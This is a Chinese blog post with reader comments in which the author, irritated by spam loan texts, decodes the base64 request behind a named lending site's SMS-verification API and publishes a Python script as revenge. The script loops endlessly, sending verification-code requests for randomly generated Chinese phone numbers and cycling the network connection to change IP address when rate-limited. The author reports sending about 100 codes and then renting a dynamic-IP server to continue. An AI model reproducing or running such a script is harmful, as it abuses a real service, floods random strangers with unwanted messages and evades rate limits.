干李良! 隔个几天就发个彩信说我授权了12万4千分24期还, 算一算这段时间, 文案都不知道换一下的吗? 更气的末尾的这句"回T退订"
你TM, 有病吧?
越想越气, 点开短信的链接, 跳转到了一个注册页面
看了眼发短信的时候的POST请求, yoho? 还来了点"加密"?
结果实际上只是把要发送的内容base64了一下而已, 解出来内容如下
{
"mobile":"13888888888",
"service":"012012"
}
还有另外一个请求, 方式一样, 解出来内容如下:
{
"mobile":"13888888888",
"type":"1",
"service":"012010"
}
经过一番研究, 发现第一个API是否请求都不影响短信验证码的下发
好了, 既然流程都知道了, 那就来一发脚本, 算是报一箭之仇
#-*- coding:utf-8 -*-
import base64, json, random, string, realpath, os
from lib.c_python import c_spider as cs
total = 0
proxies = None
def phone_num():
num_start = ['134', '135', '136', '137', '138', '139', '150', '151', '152', '158', '159', '157', '182', '187', '188',
'147', '130', '131', '132', '155', '156', '185', '186', '133', '153', '180', '189']
start = random.choice(num_start)
end = ''.join(random.sample(string.digits,8))
return start+end
while True:
try:
tel = phone_num()
# data = {
# 'jsonData': str(base64.b64encode(('{"mobile":"%s","service":"012012"}' % tel).encode('utf-8')), 'utf-8')
# }
data2 = {
'jsonData': str(base64.b64encode(('{"mobile":"%s","type":"2","service":"012010"}' % tel).encode('utf-8')), 'utf-8')
}
header = {
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'Referer': 'https://jie.gomemyf.com/register-activation/',
'Accept': 'application/json, text/plain, */*',
}
# res = cs.postForRequest('https://jie.gomemyf.com/jie-api/facade/h5channel.do', data, timeout=3, proxies=proxies)
res = cs.postForRequest('https://jie.gomemyf.com/jie-api/facade/h5channel.do', data2, timeout=3, proxies=proxies)
res = base64.b64decode(res)
res = json.loads(res)
if res['code'] == '02005050038':
print('切换IP中...')
os.popen("/sbin/ifdown ppp0").read()
os.popen("/sbin/ifup ppp0").read()
total += 1
print('(%s) %s >> %s' % (total, tel, res))
except Exception as e:
print(e)
pass
大概发了100条验证码吧, 就提示操作频繁, 然后开始使用代理, 但是我自己维护的代理池子https代理太少而且效率很慢, 想了下, 某宝直接买了个动态IP VPS
233333,这就是大佬的世界吗?趴
好厉害,回T退订”‘/’_’/'”
辛苦小C啦x